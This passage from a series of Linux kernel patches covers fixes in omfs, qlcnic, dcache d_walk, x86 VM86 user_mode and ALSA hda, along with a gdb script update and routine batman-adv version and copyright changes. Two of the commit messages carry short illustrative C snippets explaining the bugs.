"omfs: Mounted volume %s\n", omfs_rb->r_name); ret = 0; From c0345ee57d461343586b5e1e2f9c3c3766d07fe6 Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:35 -0700 Subject: [PATCH 432/872] omfs: fix sign confusion for bitmap loop counter The count variable is used to iterate down to (below) zero from the size of the bitmap and handle one-filling the remainder of the last partial bitmap block. The loop conditional expects count to be signed in order to detect when the final block is processed, after which count goes negative. Unfortunately, a recent change made this unsigned along with some other related fields. The result of this is that during mount, omfs_get_imap will overrun the bitmap array and corrupt memory unless the number of blocks happens to be a multiple of 8 * blocksize.
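As a standalone illustration of the overrun (BLOCK_BITS and blocks_needed() are made up for this sketch; the real loop lives in omfs_get_imap()):

#include <stdio.h>

#define BLOCK_BITS 64   /* hypothetical number of bitmap bits per block */

static int blocks_needed(int total_bits, int use_signed)
{
	int visited = 0;

	if (use_signed) {
		/* count goes negative on the last partial block and the loop stops */
		for (int count = total_bits; count > 0; count -= BLOCK_BITS)
			visited++;
	} else {
		/* the subtraction wraps around instead of going negative, so the
		 * condition stays true and the walk runs off the end of the array;
		 * the guard below only exists to keep the demo finite */
		for (unsigned int count = total_bits; count > 0; count -= BLOCK_BITS) {
			visited++;
			if (visited > 8)
				return -1;
		}
	}
	return visited;
}

int main(void)
{
	/* 100 bits is not a multiple of BLOCK_BITS, so the last block is partial */
	printf("signed counter:   %d blocks\n", blocks_needed(100, 1));
	printf("unsigned counter: %d blocks (-1 means the loop overran)\n",
	       blocks_needed(100, 0));
	return 0;
}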
Fix by changing count back to signed: it is guaranteed to fit in an s32 without overflow due to an enforced limit on the number of blocks in the filesystem. Signed-off-by: Bob Copeland Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 6ce542c11f98..3d935c81789a 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -306,7 +306,8 @@ static const struct super_operations omfs_sops = { */ static int omfs_get_imap(struct super_block *sb) { - unsigned int bitmap_size, count, array_size; + unsigned int bitmap_size, array_size; + int count; struct omfs_sb_info *sbi = OMFS_SB(sb); struct buffer_head *bh; unsigned long **ptr; From 5a6b2b36a8249ec9dfb2a714acadad86d9cc0aee Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:37 -0700 Subject: [PATCH 433/872] omfs: fix potential integer overflow in allocator Both 'i' and 'bits_per_entry' are signed integers but the result is a u64 block number. Cast i to u64 to avoid truncation on 32-bit targets. Found by Coverity (CID 200679). Signed-off-by: Bob Copeland Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/bitmap.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/omfs/bitmap.c b/fs/omfs/bitmap.c index 082234581d05..83f4e76511c2 100644 --- a/fs/omfs/bitmap.c +++ b/fs/omfs/bitmap.c @@ -159,7 +159,7 @@ int omfs_allocate_range(struct super_block *sb, goto out; found: - *return_block = i * bits_per_entry + bit; + *return_block = (u64) i * bits_per_entry + bit; *return_size = run; ret = set_run(sb, i, bits_per_entry, bit, run, 1); From ca3f172c197b5fa6b2693f5f93d4928a1420fb07 Mon Sep 17 00:00:00 2001 From: Adrien Schildknecht Date: Thu, 28 May 2015 15:44:40 -0700 Subject: [PATCH 434/872] scripts/gdb: fix lx-lsmod refcnt Commit 2f35c41f58a9 ("module: Replace module_ref with atomic_t refcnt") changes the way refcnt is handled but did not update the gdb script to use the new variable. Since refcnt is not per-cpu anymore, we can directly read its value. 
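A plain-C model of the layout change the gdb script is adapting to - NR_CPUS, struct old_module_ref and struct new_module are illustrative stand-ins, not kernel or gdb types:

#include <stdio.h>

#define NR_CPUS 4

struct old_module_ref { unsigned long incs, decs; };   /* one instance per CPU */
struct new_module     { int refcnt; };                 /* atomic_t in the kernel */

/* The removed Python loop did the moral equivalent of this sum. */
static long old_read_refcnt(const struct old_module_ref per_cpu[NR_CPUS])
{
	long ref = 0;
	int cpu;

	for (cpu = 0; cpu < NR_CPUS; cpu++)
		ref += (long)per_cpu[cpu].incs - (long)per_cpu[cpu].decs;
	return ref;
}

int main(void)
{
	struct old_module_ref old[NR_CPUS] = { {3, 1}, {2, 2}, {5, 4}, {0, 0} };
	struct new_module new_mod = { .refcnt = 3 };

	printf("old layout, summed per cpu : %ld\n", old_read_refcnt(old));
	printf("new layout, read directly  : %d\n", new_mod.refcnt);
	return 0;
}

With a single counter field there is nothing left to iterate over, which is why the patch below can print module['refcnt']['counter'] directly.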
Signed-off-by: Adrien Schildknecht Reviewed-by: Jan Kiszka Cc: Pantelis Koukousoulas Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- scripts/gdb/linux/modules.py | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/scripts/gdb/linux/modules.py b/scripts/gdb/linux/modules.py index a1504c4f1900..25db8cff44a2 100644 --- a/scripts/gdb/linux/modules.py +++ b/scripts/gdb/linux/modules.py @@ -73,18 +73,11 @@ def invoke(self, arg, from_tty): " " if utils.get_long_type().sizeof == 8 else "")) for module in module_list(): - ref = 0 - module_refptr = module['refptr'] - for cpu in cpus.cpu_list("cpu_possible_mask"): - refptr = cpus.per_cpu(module_refptr, cpu) - ref += refptr['incs'] - ref -= refptr['decs'] - gdb.write("{address} {name:<19} {size:>8} {ref}".format( address=str(module['module_core']).split()[0], name=module['name'].string(), size=str(module['core_size']), - ref=str(ref))) + ref=str(module['refcnt']['counter']))) source_list = module['source_list'] t = self._module_use_type.get_type().pointer() From d7a32b6e6b1ad361ea89805855ef82dd1dea9128 Mon Sep 17 00:00:00 2001 From: Vladimir Zapolskiy Date: Tue, 26 May 2015 03:49:45 +0300 Subject: [PATCH 435/872] net: qlcnic: clean up sysfs error codes Replace confusing QL_STATUS_INVALID_PARAM == -1 == -EPERM with -EINVAL and QLC_STATUS_UNSUPPORTED_CMD == -2 == -ENOENT with -EOPNOTSUPP, the latter error code is arguable, but it is already used in the driver, so let it be here as well. Also remove always false (!buf) check on read(), the driver should not care if userspace gets its EFAULT or not. Signed-off-by: Vladimir Zapolskiy Acked-by: Rajesh Borundia Signed-off-by: David S. Miller --- drivers/net/ethernet/qlogic/qlcnic/qlcnic.h | 3 - .../net/ethernet/qlogic/qlcnic/qlcnic_main.c | 2 +- .../net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c | 77 +++++++++---------- 3 files changed, 36 insertions(+), 46 deletions(-) diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h b/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h index f221126a5c4e..055f3763e577 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h @@ -1326,9 +1326,6 @@ struct qlcnic_eswitch { }; -/* Return codes for Error handling */ -#define QL_STATUS_INVALID_PARAM -1 - #define MAX_BW 100 /* % of link speed */ #define MIN_BW 1 /* % of link speed */ #define MAX_VLAN_ID 4095 diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c index 367f3976df56..2f6cc423ab1d 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c @@ -1031,7 +1031,7 @@ int qlcnic_init_pci_info(struct qlcnic_adapter *adapter) pfn = pci_info[i].id; if (pfn >= ahw->max_vnic_func) { - ret = QL_STATUS_INVALID_PARAM; + ret = -EINVAL; dev_err(&adapter->pdev->dev, "%s: Invalid function 0x%x, max 0x%x\n", __func__, pfn, ahw->max_vnic_func); goto err_eswitch; diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c index 59a721fba018..05c28f2c6df7 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c @@ -24,8 +24,6 @@ #include #endif -#define QLC_STATUS_UNSUPPORTED_CMD -2 - int qlcnicvf_config_bridged_mode(struct qlcnic_adapter *adapter, u32 enable) { return -EOPNOTSUPP; @@ -166,7 +164,7 @@ static int qlcnic_82xx_store_beacon(struct qlcnic_adapter *adapter, u8 b_state, b_rate; if (len != sizeof(u16)) - return 
QL_STATUS_INVALID_PARAM; + return -EINVAL; memcpy(&beacon, buf, sizeof(u16)); err = qlcnic_validate_beacon(adapter, beacon, &b_state, &b_rate); @@ -383,17 +381,17 @@ static int validate_pm_config(struct qlcnic_adapter *adapter, dest_pci_func = pm_cfg[i].dest_npar; src_index = qlcnic_is_valid_nic_func(adapter, src_pci_func); if (src_index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; dest_index = qlcnic_is_valid_nic_func(adapter, dest_pci_func); if (dest_index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; s_esw_id = adapter->npars[src_index].phy_port; d_esw_id = adapter->npars[dest_index].phy_port; if (s_esw_id != d_esw_id) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } return 0; @@ -414,7 +412,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, count = size / sizeof(struct qlcnic_pm_func_cfg); rem = size % sizeof(struct qlcnic_pm_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); pm_cfg = (struct qlcnic_pm_func_cfg *)buf; @@ -427,7 +425,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, action = !!pm_cfg[i].action; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; id = adapter->npars[index].phy_port; ret = qlcnic_config_port_mirroring(adapter, id, @@ -440,7 +438,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, pci_func = pm_cfg[i].pci_func; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; id = adapter->npars[index].phy_port; adapter->npars[index].enable_pm = !!pm_cfg[i].action; adapter->npars[index].dest_npar = id; @@ -499,11 +497,11 @@ static int validate_esw_config(struct qlcnic_adapter *adapter, for (i = 0; i < count; i++) { pci_func = esw_cfg[i].pci_func; if (pci_func >= ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (adapter->ahw->op_mode == QLCNIC_MGMT_FUNC) if (qlcnic_is_valid_nic_func(adapter, pci_func) < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; switch (esw_cfg[i].op_mode) { case QLCNIC_PORT_DEFAULTS: @@ -517,25 +515,25 @@ static int validate_esw_config(struct qlcnic_adapter *adapter, if (ret != QLCNIC_NON_PRIV_FUNC) { if (esw_cfg[i].mac_anti_spoof != 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (esw_cfg[i].mac_override != 1) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (esw_cfg[i].promisc_mode != 1) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } break; case QLCNIC_ADD_VLAN: if (!IS_VALID_VLAN(esw_cfg[i].vlan_id)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (!esw_cfg[i].op_type) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; break; case QLCNIC_DEL_VLAN: if (!esw_cfg[i].op_type) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; break; default: - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } } @@ -559,7 +557,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, count = size / sizeof(struct qlcnic_esw_func_cfg); rem = size % sizeof(struct qlcnic_esw_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); esw_cfg = (struct qlcnic_esw_func_cfg *)buf; @@ -570,7 +568,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, for (i = 0; i < count; i++) { if (adapter->ahw->op_mode == QLCNIC_MGMT_FUNC) if (qlcnic_config_switch_port(adapter, &esw_cfg[i])) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if 
(adapter->ahw->pci_func != esw_cfg[i].pci_func) continue; @@ -604,7 +602,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, pci_func = esw_cfg[i].pci_func; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; npar = &adapter->npars[index]; switch (esw_cfg[i].op_mode) { case QLCNIC_PORT_DEFAULTS: @@ -654,7 +652,7 @@ static ssize_t qlcnic_sysfs_read_esw_config(struct file *file, esw_cfg[pci_func].pci_func = pci_func; if (qlcnic_get_eswitch_port_config(adapter, &esw_cfg[pci_func])) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); return size; @@ -669,11 +667,11 @@ static int validate_npar_config(struct qlcnic_adapter *adapter, for (i = 0; i < count; i++) { pci_func = np_cfg[i].pci_func; if (qlcnic_is_valid_nic_func(adapter, pci_func) < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (!IS_VALID_BW(np_cfg[i].min_bw) || !IS_VALID_BW(np_cfg[i].max_bw)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } return 0; } @@ -694,7 +692,7 @@ static ssize_t qlcnic_sysfs_write_npar_config(struct file *file, count = size / sizeof(struct qlcnic_npar_func_cfg); rem = size % sizeof(struct qlcnic_npar_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); np_cfg = (struct qlcnic_npar_func_cfg *)buf; @@ -717,7 +715,7 @@ static ssize_t qlcnic_sysfs_write_npar_config(struct file *file, return ret; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; adapter->npars[index].min_bw = nic_info.min_tx_bw; adapter->npars[index].max_bw = nic_info.max_tx_bw; } @@ -784,13 +782,13 @@ static ssize_t qlcnic_sysfs_get_port_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (size != sizeof(struct qlcnic_esw_statistics)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (offset >= adapter->ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; memset(&port_stats, 0, size); ret = qlcnic_get_port_stats(adapter, offset, QLCNIC_QUERY_RX_COUNTER, @@ -819,13 +817,13 @@ static ssize_t qlcnic_sysfs_get_esw_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (size != sizeof(struct qlcnic_esw_statistics)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (offset >= QLCNIC_NIU_MAX_XG_PORTS) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; memset(&esw_stats, 0, size); ret = qlcnic_get_eswitch_stats(adapter, offset, QLCNIC_QUERY_RX_COUNTER, @@ -853,10 +851,10 @@ static ssize_t qlcnic_sysfs_clear_esw_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (offset >= QLCNIC_NIU_MAX_XG_PORTS) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; ret = qlcnic_clear_esw_stats(adapter, QLCNIC_STATS_ESWITCH, offset, QLCNIC_QUERY_RX_COUNTER); @@ -883,10 +881,10 @@ static ssize_t qlcnic_sysfs_clear_port_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (offset >= adapter->ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; ret = qlcnic_clear_esw_stats(adapter, QLCNIC_STATS_PORT, offset, QLCNIC_QUERY_RX_COUNTER); @@ -953,9 +951,7 @@ static ssize_t qlcnic_83xx_sysfs_flash_read_handler(struct file *filp, struct 
qlcnic_adapter *adapter = dev_get_drvdata(dev); if (!size) - return QL_STATUS_INVALID_PARAM; - if (!buf) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; count = size / sizeof(u32); @@ -1132,9 +1128,6 @@ static ssize_t qlcnic_83xx_sysfs_flash_write_handler(struct file *filp, struct device *dev = container_of(kobj, struct device, kobj); struct qlcnic_adapter *adapter = dev_get_drvdata(dev); - if (!buf) - return QL_STATUS_INVALID_PARAM; - ret = kstrtoul(buf, 16, &data); switch (data) { From 210347e1846d391aea863fb69165a2d70581f838 Mon Sep 17 00:00:00 2001 From: Roger Luethi Date: Tue, 26 May 2015 19:12:54 +0200 Subject: [PATCH 436/872] via-rhine: Resigning as maintainer I don't have enough time to look after via-rhine anymore. Signed-off-by: Roger Luethi Signed-off-by: David S. Miller --- MAINTAINERS | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 474bcb6c0bac..1bbacdaf5cf3 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -10588,8 +10588,7 @@ F: drivers/virtio/virtio_input.c F: include/uapi/linux/virtio_input.h VIA RHINE NETWORK DRIVER -M: Roger Luethi -S: Maintained +S: Orphan F: drivers/net/ethernet/via/via-rhine.c VIA SD/MMC CARD CONTROLLER DRIVER From 2159184ea01e4ae7d15f2017e296d4bc82d5aeb0 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 28 May 2015 23:09:19 -0400 Subject: [PATCH 437/872] d_walk() might skip too much when we find that a child has died while we'd been trying to ascend, we should go into the first live sibling itself, rather than its sibling. Off-by-one in question had been introduced in "deal with deadlock in d_walk()" and the fix needs to be backported to all branches this one has been backported to. Cc: stable@vger.kernel.org # 3.2 and later Signed-off-by: Al Viro --- fs/dcache.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/fs/dcache.c b/fs/dcache.c index 656ce522a218..37b5afdaf698 100644 --- a/fs/dcache.c +++ b/fs/dcache.c @@ -1239,13 +1239,13 @@ static void d_walk(struct dentry *parent, void *data, /* might go back up the wrong parent if we have had a rename. */ if (need_seqretry(&rename_lock, seq)) goto rename_retry; - next = child->d_child.next; - while (unlikely(child->d_flags & DCACHE_DENTRY_KILLED)) { + /* go into the first sibling still alive */ + do { + next = child->d_child.next; if (next == &this_parent->d_subdirs) goto ascend; child = list_entry(next, struct dentry, d_child); - next = next->next; - } + } while (unlikely(child->d_flags & DCACHE_DENTRY_KILLED)); rcu_read_unlock(); goto resume; } From 7ba554b5ac69e5f3edac9ce3233beb5acd480878 Mon Sep 17 00:00:00 2001 From: Jan Beulich Date: Thu, 28 May 2015 09:16:45 +0100 Subject: [PATCH 438/872] x86/asm/entry/32: Really make user_mode() work correctly for VM86 mode While commit efa7045103 ("x86/asm/entry: Make user_mode() work correctly if regs came from VM86 mode") claims that "user_mode() is now identical to user_mode_vm()", this wasn't actually the case - no prior commit made it so. Signed-off-by: Jan Beulich Acked-by: Andy Lutomirski Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Brian Gerst Cc: Denys Vlasenko Cc: H. 
Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/5566EB0D020000780007E655@mail.emea.novell.com Signed-off-by: Ingo Molnar --- arch/x86/include/asm/ptrace.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/include/asm/ptrace.h b/arch/x86/include/asm/ptrace.h index 19507ffa5d28..5fabf1362942 100644 --- a/arch/x86/include/asm/ptrace.h +++ b/arch/x86/include/asm/ptrace.h @@ -107,7 +107,7 @@ static inline unsigned long regs_return_value(struct pt_regs *regs) static inline int user_mode(struct pt_regs *regs) { #ifdef CONFIG_X86_32 - return (regs->cs & SEGMENT_RPL_MASK) == USER_RPL; + return ((regs->cs & SEGMENT_RPL_MASK) | (regs->flags & X86_VM_MASK)) >= USER_RPL; #else return !!(regs->cs & 3); #endif From b47eee2e0a7de623c24dbcaf303c3bf2b5155455 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Fri, 29 May 2015 09:43:29 +0200 Subject: [PATCH 439/872] ALSA: hda - Fix lost sound due to stream_pm ops cleanup The commit [49fb18972581: ALSA: hda - Set stream_pm ops automatically by generic parser] resulted in regressions on some Realtek and VIA codecs because these drivers set patch_ops after calling the generic parser, thus stream_pm got cleared to NULL again. I haven't noticed since I tested with IDT codec. Restore (partial revert) the stream_pm ops for them to fix the regression. Fixes: 49fb18972581 ('ALSA: hda - Set stream_pm ops automatically by generic parser') Reported-by: Jeremiah Mahler Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + sound/pci/hda/patch_via.c | 1 + 2 files changed, 2 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index ea3af38eee58..464168426465 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5729,6 +5729,7 @@ static int patch_alc269(struct hda_codec *codec) set_beep_amp(spec, spec->gen.mixer_nid, 0x04, HDA_INPUT); codec->patch_ops = alc_patch_ops; + codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; #ifdef CONFIG_PM codec->patch_ops.suspend = alc269_suspend; codec->patch_ops.resume = alc269_resume; diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 742087ef378f..31a95cca015d 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -472,6 +472,7 @@ static const struct hda_codec_ops via_patch_ops = { .init = via_init, .free = via_free, .unsol_event = snd_hda_jack_unsol_event, + .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, .check_power_status = via_check_power_status, From 70e717762d2fa80e995303995c80e0abc6419997 Mon Sep 17 00:00:00 2001 From: Simon Wunderlich Date: Tue, 28 Apr 2015 20:29:53 +0200 Subject: [PATCH 440/872] batman-adv: Start new development cycle Signed-off-by: Simon Wunderlich --- net/batman-adv/main.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 4d2318829a34..9d5657e14765 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -24,7 +24,7 @@ #define BATADV_DRIVER_DEVICE "batman-adv" #ifndef BATADV_SOURCE_VERSION -#define BATADV_SOURCE_VERSION "2015.0" +#define BATADV_SOURCE_VERSION "2015.1" #endif /* B.A.T.M.A.N. 
parameters */ From 9f6446c7f9af084763037334d37e85dacfcbd403 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Thu, 23 Apr 2015 13:16:35 +0200 Subject: [PATCH 441/872] batman-adv: update copyright years for 2015 Signed-off-by: Sven Eckelmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- net/batman-adv/bat_algo.h | 2 +- net/batman-adv/bat_iv_ogm.c | 2 +- net/batman-adv/bitarray.c | 2 +- net/batman-adv/bitarray.h | 2 +- net/batman-adv/bridge_loop_avoidance.c | 2 +- net/batman-adv/bridge_loop_avoidance.h | 2 +- net/batman-adv/debugfs.c | 2 +- net/batman-adv/debugfs.h | 2 +- net/batman-adv/distributed-arp-table.c | 2 +- net/batman-adv/distributed-arp-table.h | 2 +- net/batman-adv/fragmentation.c | 2 +- net/batman-adv/fragmentation.h | 2 +- net/batman-adv/gateway_client.c | 2 +- net/batman-adv/gateway_client.h | 2 +- net/batman-adv/gateway_common.c | 2 +- net/batman-adv/gateway_common.h | 2 +- net/batman-adv/hard-interface.c | 2 +- net/batman-adv/hard-interface.h | 2 +- net/batman-adv/hash.c | 2 +- net/batman-adv/hash.h | 2 +- net/batman-adv/icmp_socket.c | 2 +- net/batman-adv/icmp_socket.h | 2 +- net/batman-adv/main.c | 2 +- net/batman-adv/main.h | 2 +- net/batman-adv/multicast.c | 2 +- net/batman-adv/multicast.h | 2 +- net/batman-adv/network-coding.c | 2 +- net/batman-adv/network-coding.h | 2 +- net/batman-adv/originator.c | 2 +- net/batman-adv/originator.h | 2 +- net/batman-adv/packet.h | 2 +- net/batman-adv/routing.c | 2 +- net/batman-adv/routing.h | 2 +- net/batman-adv/send.c | 2 +- net/batman-adv/send.h | 2 +- net/batman-adv/soft-interface.c | 2 +- net/batman-adv/soft-interface.h | 2 +- net/batman-adv/sysfs.c | 2 +- net/batman-adv/sysfs.h | 2 +- net/batman-adv/translation-table.c | 2 +- net/batman-adv/translation-table.h | 2 +- net/batman-adv/types.h | 2 +- 43 files changed, 43 insertions(+), 43 deletions(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index eb7d8c0388e4..79833ebcc2dd 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -1,5 +1,5 @@ # -# Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +# Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: # # Marek Lindner, Simon Wunderlich # diff --git a/net/batman-adv/bat_algo.h b/net/batman-adv/bat_algo.h index 4e49666f8c65..4e59cf3eb079 100644 --- a/net/batman-adv/bat_algo.h +++ b/net/batman-adv/bat_algo.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 00e00e09b000..fc299c03a438 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/bitarray.c b/net/batman-adv/bitarray.c index e3da07a64026..40e4a2a18e45 100644 --- a/net/batman-adv/bitarray.c +++ b/net/batman-adv/bitarray.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/bitarray.h b/net/batman-adv/bitarray.h index 2acaafe60188..be497be696d1 100644 --- a/net/batman-adv/bitarray.h +++ b/net/batman-adv/bitarray.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. 
contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/bridge_loop_avoidance.c b/net/batman-adv/bridge_loop_avoidance.c index ac4b96eccade..fa941cd7d8ad 100644 --- a/net/batman-adv/bridge_loop_avoidance.c +++ b/net/batman-adv/bridge_loop_avoidance.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich * diff --git a/net/batman-adv/bridge_loop_avoidance.h b/net/batman-adv/bridge_loop_avoidance.h index 43c985d92c3e..1f506d34039e 100644 --- a/net/batman-adv/bridge_loop_avoidance.h +++ b/net/batman-adv/bridge_loop_avoidance.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich * diff --git a/net/batman-adv/debugfs.c b/net/batman-adv/debugfs.c index a4972874c056..0c213a892296 100644 --- a/net/batman-adv/debugfs.c +++ b/net/batman-adv/debugfs.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/debugfs.h b/net/batman-adv/debugfs.h index 37c4d6ddd04d..f3b49c394446 100644 --- a/net/batman-adv/debugfs.h +++ b/net/batman-adv/debugfs.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/distributed-arp-table.c b/net/batman-adv/distributed-arp-table.c index aad022dd15df..da1742d9059f 100644 --- a/net/batman-adv/distributed-arp-table.c +++ b/net/batman-adv/distributed-arp-table.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Antonio Quartulli * diff --git a/net/batman-adv/distributed-arp-table.h b/net/batman-adv/distributed-arp-table.h index 2fe0764c64be..ed41b8edba18 100644 --- a/net/batman-adv/distributed-arp-table.h +++ b/net/batman-adv/distributed-arp-table.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Antonio Quartulli * diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index 3d1dcaa3e8b5..af495cc861fe 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ 